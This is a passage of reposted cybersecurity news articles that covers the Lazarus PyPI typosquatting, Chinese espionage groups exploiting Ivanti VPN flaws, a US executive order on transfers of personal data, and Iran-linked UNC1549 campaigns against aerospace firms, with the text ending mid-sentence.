target="_blank">said</a>. "Therefore, the attacker probably prepared the malware-containing malicious packages to target users' typos in installing Python packages."</p> <p>The disclosure comes days after Phylum <a href="https://thehackernews.com/2024/02/north-korean-hackers-targeting.html" rel="nofollow" target="_blank">uncovered</a> several rogue packages on the npm registry that have been used to single out software developers as part of a campaign codenamed Contagious Interview.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>An interesting commonality between the two sets of attacks is that the malicious code is concealed within the test script ("test.py"). In this case, however, the test file is merely a smokescreen for what's an XOR-encoded DLL file, which, in turn, creates two DLL files named IconCache.db and NTUSER.DAT.</p> <p>The attack sequence then uses NTUSER.DAT to load and execute IconCache.db, a malware called Comebacker that's responsible for establishing connections with a command-and-control (C2) server to fetch and run a Windows executable file.</p> <p>JPCERT/CC said the packages are a continuation of a campaign that Phylum first <a href="https://thehackernews.com/2023/11/beware-developers-blazestealer-malware.html" rel="nofollow" target="_blank">detailed</a> in November 2023 as leveraging crypto-themed npm modules to deliver Comebacker.</p> <p>"Attackers may be targeting users' typos to have the malware downloaded," Tomonaga said. "When you install modules and other kinds of software in your development environment, please do so carefully to avoid installing unwanted packages."</p> <div count="4" id="trim-sidebar"></div> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-88062850098352655812024-02-28T22:21:00.001-08:002024-02-28T22:21:54.958-08:00Chinese Hackers Exploiting Ivanti VPN Flaws To Deploy New Malware<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTA4G7W5nCy41chyphenhyphenzsbCHOfbCVE3X6EFBHZusr3QAav4nT3Jw3OO8JCBCbkRmaEu3Jm_-4YMs2MYD60FQL-XDaiyw-2GBC_MS4ALQmyRpvP0vaXXipKavQsCN1WU0Ov4etsDx69E8I4A/s1600/h25.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTA4G7W5nCy41chyphenhyphenzsbCHOfbCVE3X6EFBHZusr3QAav4nT3Jw3OO8JCBCbkRmaEu3Jm_-4YMs2MYD60FQL-XDaiyw-2GBC_MS4ALQmyRpvP0vaXXipKavQsCN1WU0Ov4etsDx69E8I4A/s1600/h25.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvBMGRX-FRhy6CYsKZLAVAI-R4Vq-OHFhUpTO_Ky7GF6UcUGzv6Kh0jYNdC5kTLbexZbAJ5ePXVe8uxpWGu0GVnHjUIKIJnONT-dn6y7dSF_2aQonNdE0ZqL9S-u1McXUreNtn-zlj4B6ssalzlcEsOZ-fB-aGbVYsuor2yZxvsD6GAlahvlQ7RT7oyJ0C/s728-rw-e365/china.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Ivanti VPN Flaws" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvBMGRX-FRhy6CYsKZLAVAI-R4Vq-OHFhUpTO_Ky7GF6UcUGzv6Kh0jYNdC5kTLbexZbAJ5ePXVe8uxpWGu0GVnHjUIKIJnONT-dn6y7dSF_2aQonNdE0ZqL9S-u1McXUreNtn-zlj4B6ssalzlcEsOZ-fB-aGbVYsuor2yZxvsD6GAlahvlQ7RT7oyJ0C/s728-rw-e365/china.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Ivanti VPN Flaws"/></a></div> <p>At least two different suspected China-linked cyber espionage clusters, tracked as <strong>UNC5325</strong> and <strong>UNC3886</strong>, have been attributed to the exploitation of security flaws in Ivanti Connect Secure VPN appliances.</p><a name='more'></a> <p>UNC5325 abused <a href="https://thehackernews.com/2024/02/ivanti-vulnerability-exploited-to.html" rel="nofollow" target="_blank">CVE-2024-21893</a> to deliver a wide range of new malware called LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK, as well as maintain persistent access to compromised appliances, Mandiant said.</p> <p>The Google-owned threat intelligence firm has assessed with moderate confidence that UNC5325 is associated with UNC3886 owing to source code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware used by the latter.</p> <p>It's worth pointing out that <a href="https://thehackernews.com/2024/01/chinese-hackers-silently-weaponized.html" rel="nofollow" target="_blank">UNC3886</a> has a track record of leveraging zero-day flaws in Fortinet and VMware solutions to deploy a variety of implants like VIRTUALPITA, VIRTUALPIE, THINCRUST, and CASTLETAP.</p> <p>"UNC3886 has primarily targeted the defense industrial base, technology, and telecommunication organizations located in the U.S. and [Asia-Pacific] regions," Mandiant researchers <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence" rel="nofollow" target="_blank">said</a>.</p> <p>The active exploitation of CVE-2024-21893 – a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA – by UNC5325 is said to have occurred as early as January 19, 2024, targeting a limited number of devices.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>The attack chain entails combining CVE-2024-21893 with a previously disclosed command injection vulnerability tracked as <a href="https://thehackernews.com/2024/01/chinese-hackers-exploiting-critical-vpn.html" rel="nofollow" target="_blank">CVE-2024-21887</a> to gain unauthorized access to susceptible appliances, ultimately leading to the deployment of a new version of <a href="https://thehackernews.com/2024/02/warning-new-malware-emerges-in-attacks.html" rel="nofollow" target="_blank">BUSHWALK</a>.</p> <p>Some instances have also involved the misuse of legitimate Ivanti components, such as SparkGateway plugins, to drop additional payloads. This includes the PITFUEL plugin to load a malicious shared object codenamed LITTLELAMB.WOOLTEA, which comes with capabilities to persist across system upgrade events, patches, and factory resets.</p> <p>It further acts as a backdoor that supports command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling.</p> <p>Also observed is another malicious SparkGateway plugin dubbed PITDOG that injects a shared object known as PITHOOK in order to persistently execute an implant referred to as PITSTOP that's designed for shell command execution, file write, and file read on the compromised appliance.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdF5UYUeT4OUUQQwOw_OnFHrPHzn4G1M1-7XurDDpBTx0SqGnI7cnbY2UXtPUoy_-o_MCL_9PXeROyr4PAPdrINayu3ssEnyoWELO8H3VO7OoCDEqbs62TbxC-f8j2t8GiRXL0KWuAVFqClVgC1MTFcXbq3iQCr8AqYhD6xxZXyLxmDGI51hyphenhyphenICuq-haQ9/s728-rw-e365/malware.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Ivanti VPN Flaws" border="0" data-original-height="523" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdF5UYUeT4OUUQQwOw_OnFHrPHzn4G1M1-7XurDDpBTx0SqGnI7cnbY2UXtPUoy_-o_MCL_9PXeROyr4PAPdrINayu3ssEnyoWELO8H3VO7OoCDEqbs62TbxC-f8j2t8GiRXL0KWuAVFqClVgC1MTFcXbq3iQCr8AqYhD6xxZXyLxmDGI51hyphenhyphenICuq-haQ9/s728-rw-e365/malware.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Ivanti VPN Flaws"/></a></div> <p>Mandiant described the threat actor as having demonstrated a "nuanced understanding of the appliance and their ability to subvert detection throughout this campaign" and using living-off-the-land (LotL) techniques to fly under the radar.</p> <p>The cybersecurity firm said it expects "UNC5325 as well as other China-nexus espionage actors to continue to leverage zero day vulnerabilities on network edge devices as well as appliance-specific malware to gain and maintain access to target environments."</p> <h3>Links Found Between Volt Typhoon and UTA0178</h3> <p>The disclosure comes as industrial cybersecurity company Dragos <a href="https://hub.dragos.com/report/voltzite-espionage-operations-targeting-u.s.-critical-systems" rel="nofollow" target="_blank">attributed</a> China-sponsored <a href="https://thehackernews.com/2024/02/chinese-hackers-operate-undetected-in.html" rel="nofollow" target="_blank">Volt Typhoon</a> (aka Voltzite) to reconnaissance and enumeration activities aimed at multiple U.S.-based electric companies, emergency services, telecommunication providers, defense industrial bases, and satellite services.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>"Voltzite's actions towards U.S. electric entities, telecommunications, and GIS systems signify clear objectives to identify vulnerabilities within the country's critical infrastructure that can be exploited in the future with destructive or disruptive cyber attacks," it said.</p> <p>Volt Typhoon's victimology footprint has since expanded to include African electric transmission and distribution providers, with evidence connecting the adversary to <a href="https://thehackernews.com/2024/01/chinese-hackers-exploit-zero-day-flaws.html" rel="nofollow" target="_blank">UTA0178</a>, a threat activity group linked to the zero-day exploitation of Ivanti Connect Secure flaws in early December 2023.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDTW6JmmiI1KT0YeXN6gO7aQEycdm2xSAjNZduJDHixuYrCP3JMSBy5LBLFk11816rdqHIf5ctHL5N22R8K4nW182-Z4vGrd2d7E3mbIAhZ3hqIf-Qs8ZyPUpGP5VTKCNM4fXhzTOzYoQ6mJBNbfN6fwqdOsG-Fin2qmAKwORSVcFwtJQ6L-mE9dkU62iG/s728-rw-e365/dragos.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Ivanti VPN Flaws" border="0" data-original-height="438" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDTW6JmmiI1KT0YeXN6gO7aQEycdm2xSAjNZduJDHixuYrCP3JMSBy5LBLFk11816rdqHIf5ctHL5N22R8K4nW182-Z4vGrd2d7E3mbIAhZ3hqIf-Qs8ZyPUpGP5VTKCNM4fXhzTOzYoQ6mJBNbfN6fwqdOsG-Fin2qmAKwORSVcFwtJQ6L-mE9dkU62iG/s728-rw-e365/dragos.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Ivanti VPN Flaws"/></a></div> <p>The cyber espionage actor, which heavily relies on LotL methods to sidestep detection, <a href="https://www.dragos.com/blog/industry-news/2023-ot-cybersecurity-year-in-review-now-available/" rel="nofollow" target="_blank">joins</a> two other new groups, namely Gananite and Laurionite, that came to light in 2023, conducting long-term reconnaissance and intellectual property theft operations targeting critical infrastructure and government entities.</p> <p>"Voltzite uses very minimal tooling and prefers to conduct their operations with as little a footprint as possible," Dragos explained. "Voltzite heavily focuses on detection evasion and long-term persistent access with the assessed intent of long-term espionage and data exfiltration."</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/chinese-hackers-exploiting-ivanti-vpn.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-72468083120263902682024-02-28T21:07:00.001-08:002024-02-28T21:07:37.386-08:00President Biden Blocks Mass Transfer Of Personal Data To High-Risk Nations<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAlYpGxdB-eaSSIYC12nI8hgVR33xoE4smJCAgeZ-3Ev84-sFGUXQCZHdfjTYfQrYl20kZqOmmZbqATSBBT-CpcOPp517czyeAjQ7a3k4vlIo_LE7EzH6W6smid-mKJpAhDjaXF18fp2A/s1600/h51.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAlYpGxdB-eaSSIYC12nI8hgVR33xoE4smJCAgeZ-3Ev84-sFGUXQCZHdfjTYfQrYl20kZqOmmZbqATSBBT-CpcOPp517czyeAjQ7a3k4vlIo_LE7EzH6W6smid-mKJpAhDjaXF18fp2A/s1600/h51.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75SVYsJUnIvLV3cnEXA8YpDKxfGHi5-9CWoMh2ojBwAQwZQVOcHd2M4xlNZaFMVCPfV7t9daLqJ4JfKYZpT82aFZcLOu8Laki1XRfVjCcmzhZI9ChxHQv-LSzvCIr5aWSmRwhXL2GngFaQD-fp6E2QkGmiW8NlMQrY1IyyhF0LnVYd-hZt-xGmdKia5vf/s728-rw-e365/bb.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="President Biden" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75SVYsJUnIvLV3cnEXA8YpDKxfGHi5-9CWoMh2ojBwAQwZQVOcHd2M4xlNZaFMVCPfV7t9daLqJ4JfKYZpT82aFZcLOu8Laki1XRfVjCcmzhZI9ChxHQv-LSzvCIr5aWSmRwhXL2GngFaQD-fp6E2QkGmiW8NlMQrY1IyyhF0LnVYd-hZt-xGmdKia5vf/s728-rw-e365/bb.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="President Biden"/></a></div> <p>U.S. President Joe Biden has <a href="https://www.whitehouse.gov/briefing-room/statements-releases/2024/02/28/fact-sheet-president-biden-issues-sweeping-executive-order-to-protect-americans-sensitive-personal-data/" rel="nofollow" target="_blank">issued</a> an Executive Order that prohibits the mass transfer of citizens' personal data to countries of concern.</p><a name='more'></a> <p>The Executive Order also "provides safeguards around other activities that can give those countries access to Americans' sensitive data," the White House said in a statement.</p> <p>This includes sensitive information such as genomic data, biometric data, personal health data, geolocation data, financial data, and certain kinds of personally identifiable information (PII).</p> <p>The U.S. government said threat actors could weaponize this information to track their citizens and pass that information to <a href="https://thehackernews.com/2024/01/ftc-bans-inmarket-for-selling-precise.html" rel="nofollow" target="_blank">data brokers</a> and foreign intelligence services, which can then be used for intrusive surveillance, scams, blackmail, and other violations of privacy.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>"Commercial data brokers and other companies can sell this data to countries of concern, or entities controlled by those countries, and it can land in the hands of foreign intelligence services, militaries, or companies controlled by foreign governments," the government said.</p> <p>In November 2023, researchers at Duke University <a href="https://techpolicy.sanford.duke.edu/data-brokers-and-the-sale-of-data-on-us-military-personnel/" rel="nofollow" target="_blank">revealed</a> that it's trivial to "obtain sensitive data about active-duty members of the military, their families, and veterans, including non-public, individually identified, and sensitive data, such as health data, financial data, and information about religious practices" from data brokers for as low as $0.12 per record.</p> <p>Stating that the sale of such data poses privacy, counterintelligence, blackmail, and national security risks, it added hostile nations could collect personal information on activists, journalists, dissidents, and marginalized communities with the goal of restricting freedom of expression and curbing dissent.</p> <p>The government said the countries of concern have a "track record of collecting and misusing data on Americans." According to the <a href="https://www.justice.gov/opa/pr/justice-department-implement-groundbreaking-executive-order-addressing-national-security" rel="nofollow" target="_blank">U.S. Justice Department</a>, the countries that fall under this category include China, Russia, Iran, North Korea, Cuba, and Venezuela.</p> <p>The Executive Order directs the federal agencies to issue regulations that establish clear protections for sensitive personal and government-related data from access and exploitation, as well as set high-security standards to limit data access via commercial agreements.</p> <p>Additionally, the order requires the Departments of Health and Human Services, Defense, and Veterans Affairs to ensure that Federal grants, contracts, and awards are not misused to facilitate access to sensitive data.</p> <p>"The Administration's decision to limit personal data flows only to a handful of countries of concern, like China, is a mistake," Senator Ron Wyden <a href="https://www.wyden.senate.gov/news/press-releases/wyden-statement-on-data-export-executive-order" rel="nofollow" target="_blank">said</a> in a statement, and that the argument that the U.S. government cannot be banned from buying Americans' data is no longer valid.</p> <p>"Authoritarian dictatorships like Saudi Arabia and U.A.E. cannot be trusted with Americans' personal data, both because they will likely use it to undermine U.S. national security and target U.S. based dissidents, but also because these countries lack effective privacy laws necessary to stop the data from being sold onwards to China."</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>The latest attempt to regulate the data broker industry comes as the U.S. <a href="https://www.state.gov/the-united-states-adds-sandvine-to-the-entity-list-for-enabling-human-rights-abuses/" rel="nofollow" target="_blank">added</a> China's Chengdu Beizhan Electronics and Canadian network intelligence firm Sandvine to its <a href="https://www.federalregister.gov/documents/2024/02/27/2024-03674/additions-of-entities-revisions-of-entries-and-removal-of-an-entity-from-the-entity-list" rel="nofollow" target="_blank">Entity List</a> after the latter's middleboxes were found to be used to <a href="https://thehackernews.com/2023/09/latest-apple-zero-days-used-to-hack.html" rel="nofollow" target="_blank">deliver spyware</a> targeting a former Egyptian member of parliament last year.</p> <p>A report from Bloomberg in September 2023 also <a href="https://www.bloomberg.com/news/articles/2023-09-26/tech-firm-sandvine-tied-to-hack-of-egyptian-politician-s-iphone" rel="nofollow" target="_blank">found</a> that Sandvine's equipment had been used by governments in Egypt and Belarus to censor content on the internet.</p> <p>Access Now <a href="https://www.accessnow.org/press-release/us-blocklists-sandvine-for-digital-repression-in-egypt/" rel="nofollow" target="_blank">said</a> Sandvine's internet-blocking technologies <a href="https://www.wired.com/story/sandvine-us-sanctions-egypt-internet-censorship/" rel="nofollow" target="_blank">facilitated human rights violations</a> by repressive governments around the world, including in Azerbaijan, Jordan, Russia, Turkey, and the U.A.E., noting it played a "direct role" in shutting down the internet in Belarus in 2020.</p> <p>"Sandvine supplies deep packet inspection tools, which have been used in mass web-monitoring and censorship to block news as well as in targeting political actors and human rights activists," the U.S. Department of State said, explaining its rationale behind adding the company to the trade restriction list. "This technology has been misused to inject commercial spyware into the devices of perceived critics and dissidents."</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/president-biden-blocks-mass-transfer-of.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-49648518829625339532024-02-28T07:48:00.001-08:002024-02-28T07:48:52.856-08:00Iran-Linked UNC1549 Hackers Target Middle East Aerospace & Defense Sectors<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgheNj2d3-KhZ7xT9wmsq9tBxt371Xc8-QJDteBfPBB6xfVCuGkTdtQ0O24E6ATyXc15xXzymwhZkWY2PVZ7fZOWLgdRp-fX21NAUJ1qfgbRmVxqqebDLL9lUNE0IIWGAmSJ8RKWEw_gtc/s1600/h46.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgheNj2d3-KhZ7xT9wmsq9tBxt371Xc8-QJDteBfPBB6xfVCuGkTdtQ0O24E6ATyXc15xXzymwhZkWY2PVZ7fZOWLgdRp-fX21NAUJ1qfgbRmVxqqebDLL9lUNE0IIWGAmSJ8RKWEw_gtc/s1600/h46.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyM2fQmAkxwXDbY_FZ3WHltIkGL1RPRI1Df0uekz1o1On2MqgES81RUs9umL32ThRp23WlZEzSmO0vIVhZ4cLPmLRXjmpKSlWL0H5ucUq1Ry1FuY9rK0YkPs502G9d1RFHTa1kH6TrastdeYFDYorTQ0fCnemeiOK982ZiSufjy6dqctqiR9VDoC_vE2xi/s728-rw-e365/cyberattack.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Aerospace & Defense Sectors" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyM2fQmAkxwXDbY_FZ3WHltIkGL1RPRI1Df0uekz1o1On2MqgES81RUs9umL32ThRp23WlZEzSmO0vIVhZ4cLPmLRXjmpKSlWL0H5ucUq1Ry1FuY9rK0YkPs502G9d1RFHTa1kH6TrastdeYFDYorTQ0fCnemeiOK982ZiSufjy6dqctqiR9VDoC_vE2xi/s728-rw-e365/cyberattack.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Aerospace & Defense Sectors"/></a></div> <p>An Iran-nexus threat actor known as <strong>UNC1549</strong> has been attributed with medium confidence to a new set of attacks targeting aerospace, aviation, and defense industries in the Middle East, including Israel and the U.A.E.</p><a name='more'></a> <p>Other targets of the cyber espionage activity likely include Turkey, India, and Albania, Google-owned Mandiant said in a new analysis.</p> <p>UNC1549 is said to overlap with <a href="https://thehackernews.com/2022/06/microsoft-seizes-41-domains-used-in.html" rel="nofollow" target="_blank">Smoke Sandstorm</a> (previously Bohrium) and <a href="https://thehackernews.com/2023/10/iranian-group-tortoiseshell-launches.html" rel="nofollow" target="_blank">Crimson Sandstorm</a> (previously Curium), the latter of which is an Islamic Revolutionary Guard Corps (IRGC) affiliated group which is also known as Imperial Kitten, TA456, Tortoiseshell, and Yellow Liderc.</p> <p>"This suspected UNC1549 activity has been active since at least June 2022 and is still ongoing as of February 2024," the company <a href="https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east" rel="nofollow" target="_blank">said</a>. "While regional in nature and focused mostly in the Middle East, the targeting includes entities operating worldwide."</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>The attacks entail the use of Microsoft Azure cloud infrastructure for command-and-control (C2) and social engineering involving job-related lures to deliver two backdoors dubbed MINIBIKE and MINIBUS.</p> <p>The spear-phishing emails are designed to disseminate links to fake websites containing <a href="https://www.cyfirma.com/outofband/iran-contributes-to-the-escalating-geo-political-threat-landscape/" rel="nofollow" target="_blank">Israel-Hamas related content</a> or phony job offers, resulting in the deployment of a malicious payload. Also observed are bogus login pages mimicking major companies to harvest credentials.</p> <p>The custom backdoors, upon establishing C2 access, act as a conduit for intelligence collection and for further access into the targeted network. Another tool deployed at this stage is a tunneling software called LIGHTRAIL that communicates using Azure cloud.</p> <p>While MINIBIKE is based in C++ and capable of file exfiltration and upload, and command execution, MINIBUS serves as a more "robust successor" with enhanced reconnaissance features.</p> <p>"The intelligence collected on these entities is of relevance to strategic Iranian interests and may be leveraged for espionage as well as kinetic operations," Mandiant said.</p> <p>"The evasion methods deployed in this campaign, namely the tailored job-themed lures combined with the use of cloud infrastructure for C2, may make it challenging for network defenders to prevent, detect, and mitigate this activity."</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>CrowdStrike, in its <a href="https://www.crowdstrike.com/blog/crowdstrike-2024-global-threat-report/" rel="nofollow" target="_blank">Global Threat Report</a> for 2024, described how "faketivists associated with Iranian state-nexus adversaries and hacktivists branding themselves as 'pro-Palestinian' focused on targeting 